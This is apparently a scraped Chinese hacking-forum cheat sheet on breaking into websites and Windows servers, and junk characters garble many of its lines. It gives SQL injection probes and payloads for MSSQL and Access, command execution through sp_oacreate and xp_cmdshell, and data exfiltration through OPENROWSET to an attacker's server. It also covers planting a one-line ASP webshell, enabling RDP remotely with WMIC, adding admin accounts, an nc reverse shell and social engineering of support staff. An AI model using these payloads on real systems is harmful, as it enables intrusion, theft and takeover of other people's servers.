SA点数据库分离技术相关! Q4 V7 Q. t. [0 Y
8 q0 X' K" P3 k! ?" u4 g. P3 f' `/ }: d( {; S3 ]# w. K* s$ T
SA点数据库分离搞法+语句:0 _# c# @$ F' E4 X. d) o
2 Y! U; s. C1 \5 \3 n. a5 J) [3 ?注射点不显错,执行下面三条语句页面都返回正常。
8 `1 _0 r6 H1 Q5 Z$ e/ wand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')& V# Y( k5 D, V8 ^$ q7 X$ X
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')/ i {5 d7 G# k2 G1 z+ h
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
3 W: {" f% x3 K! _7 U可以列目录,判断系统为2000,web与数据库分离
0 N4 F% K1 [6 A) E/ G- _遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。2 S" ~" l0 H. k7 u! P5 j1 R
在注射点上执行. S; _5 Q& {1 j
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--1 x+ O# q( s5 k% f
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP1 D; Z4 V W% x3 Y; y: d
还有我用NC监听得其他端口都没有得到IP。& w+ |- w3 Q! t! M
0 }2 A9 K: f3 E' u; Y; F; n8 c `
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
% L/ Q3 f6 E8 O, j$ N% o6 z'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--9 G3 W! H7 a+ d
5 d" |! ?6 A) p1 Q
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--! g9 h- r" r4 |0 K+ u
6 G3 D V1 Q. b2 h5 X现在就猜想是不是数据库是内网而且不能连外网。
2 l% }; w3 f! T4 }& G. w6 m' `& L2 q9 N
- m9 r0 h' }: \3 h6 `# Kaccess导出txt文本代码
& @- Z4 I" {# `! U5 kSELECT * into [test.txt] in 'd:\web\' 'text;' from admin' ]' e1 c) e* K: s7 J
/ P/ j/ z, E7 v- D+ _
) [1 l& [7 u. q7 [: U0 e0 r9 Q
1 j$ a7 g3 |7 L7 x自动跳转到指定网站代码头
' _2 i! x/ X6 `7 g/ f. }, u) k8 E<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
& R" S0 x+ p* |6 i' I: a
+ l+ p; m3 @9 r% x. p" H3 v) D9 M' e7 X
入侵java or jsp站点时默认配置文件路径:
- N+ ^+ C$ W0 Q" a k% T\web-inf\web.xml
7 O* @% f1 |7 k$ G' w. t. V7 O1 htomcat下的配置文件位置:. h5 d9 ~3 f" b& j, y: E
\conf\server.xml (前面加上tomcat路径), { j R- N2 I6 `
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
' v0 n9 v x' \: Z
7 V+ s$ h# X! P5 H0 @/ q, F C# T f$ y' w+ ]* D9 q
4 g9 X2 S" V+ A% J, x$ g+ `检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:* t' P+ u7 j4 h/ M
-1%23
( i }) n5 v/ n' d. P' ?- I>
5 Q( `6 Y* T3 |8 J! z0 f/ o+ g2 s3 u<
; R# \5 T4 p% S+ w0 ]1 S1'+or+'1'='1
9 y3 Z- ]# L/ N7 Z1 z4 ]id=8%bf. @( v, j1 {# R; r: ?4 Q
# }: S! F& A$ E( O# m
全新注入点检测试法:
- z" }2 R: {8 a3 w* g+ ~在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。7 I! M! r% @4 L$ k3 @7 u
- ^) i3 e! ^% W& H& Z! N在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。( R9 [. u. `2 Z8 [
f6 v, _$ ]. A7 h8 j4 T" I
搜索型注入判断方法:0 r2 C7 B( o8 l4 i% Y; j g+ [
北京%' and '1'='1' and '%'='
/ ~9 z7 C3 c1 u, H: {" M8 v6 a( K北京%' and '1'='2' and '%'='% M+ {5 N" @% T: L. o7 D5 o
: p. z: ?8 t* z% c3 _
4 K9 d$ f, `2 ]COOKIES注入:) j; E/ s- t) C4 t0 ~2 X8 ^
. n6 u( c$ x! Z- ~# @
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
1 y- m. E R8 ^1 h7 ~! I; P) h% S [4 {
2000专业版查看本地登录用户命令:
$ w7 h( @; f& ]' E% f/ A4 gnet config workstation
( @& o: d/ E: Z" d2 i0 L
x `1 d& B- s3 K$ e3 N* U, n" d
2003下查看ipsec配置和默认防火墙配置命令:$ G& y" i1 D8 m9 `, M
netsh firewall show config; t; A: l0 g, \5 k7 d: o
netsh ipsec static show all6 p5 r3 B" J6 V/ y
- `5 w8 f# k6 X
不指派指定策略命令:
E+ \/ i j `" l# w8 ?3 p" @netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
3 A9 G! L1 k1 l3 \9 O5 inetsh ipsec static show policy all 显示策略名
9 f. h6 w4 h( m* {! {+ k
; |7 _0 k& a3 X5 W# f& O. }0 b
猜管理员后台小技巧:
6 V" G( c7 `' t6 ]9 b& Madmin/left.asp 0 A' g" C5 t% T; D; c) K% l# \6 f" i# g
admin/main.asp' K1 x8 h: i8 j) `' V
admin/top.asp
! q/ ~+ R( i/ H+ Sadmin/admin.asp 6 ~6 Y7 F' L, \$ E
会现出菜单导航,然后迅雷下载全部链接
# B' k7 a9 \$ l4 h' k6 ~0 |' `$ B2 K' e9 E
# W6 m3 w. P: t/ x% ` y2 [1 h, S
社会工程学:
8 `4 ~; L' z! p* W3 [用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
1 U: r0 Q9 V1 _然后去骗客服) X4 t2 _4 N/ m# z& ]
( e' }3 d! }$ Q a
, T+ e1 {5 m W$ K% |' Y8 ]% q统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: ) l p% a+ t1 O, T; E1 n0 @! i6 D4 n
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 7 U9 V& b" x1 x. W7 a# F* p# D
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
! t' }: b3 w+ j2 h% ~
" P8 E9 a# H/ v! Z6 H1 }+ H( C3 |6 m( U* s' ~) l
& G/ D( K+ t, w8 ?* R3 p* U, g( Q
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
! `& {- H: q& H& k- v
7 k3 _8 M. ^6 o4 C
# ^; [) Q) E& b7 i) p1 ?
5 b" h$ G0 K9 x7 [CMD加密注册表位置
3 S! i) u3 G5 }( e(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
* O! M9 v) m" ~AutoRun
7 ]" _ |( r, M* m) Y& `0 V7 t0 t t" W! u/ j5 G9 Z/ ? V: v
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
+ j/ M. {" s3 @9 EAutoRun3 u, N2 W3 E3 Q* ]3 m6 R8 {7 f
7 F2 X( E: \; U* G9 k' d/ n# L4 ?
在找注入时搜索Hidden,把他改成test" I v% m R: Y q: N" \
- e8 D& J& Q' \0 x( T: c. T
1 u' ^+ N( q- H( X
7 P" Z2 k6 F* Mmstsc /v:IP /console
1 q. `' Q+ S' {% l3 U/ i
$ h! G. |) J4 F6 m0 N0 s* l
9 T% T/ q. c0 W) x一句话开3389:# }/ m0 ^' H% y* g; J: j
. O3 u- L# ? L5 W* @% b/ C
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
: b8 {- p ]- `* _$ R1 L( A开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了. c3 H+ U0 ^. W% I8 n6 J V
" c" s8 |9 m" F% s2 G6 O# y) j. ?9 w2 ~0 j' f/ k4 S1 b4 Z
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:0 l" q2 e, d) h3 f. T, @: k
Insert into admin(user,pwd) values('test','test'): h, F. R; y% [4 a" l7 M2 b: M; ~" I
& P3 j" t: i/ I; a; @( J* y# o1 e& Q- X* _; Y: I
NC反弹
1 U! g" u5 X/ X先在本机执行: nc -vv -lp 监听的端口 (自己执行) ) u. @4 O9 j* v
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)* C8 K8 {# c3 M" w4 A: e
3 ~- i+ X8 l) k, u) n. F/ I
. ^# P/ F+ }, \1 P) @' {: |: B1 u
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题3 T q" G. T" I9 z9 H0 @
! R5 {* q) h! X+ r- ?
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录6 n' Z& ~% A4 a- L2 J! h- e6 g
例如:
! R; v1 t2 T7 S1 ysubst k: d:\www\ 用d盘www目录替代k盘
) c$ d! y( \( {subst k: /d 解除K盘代替 |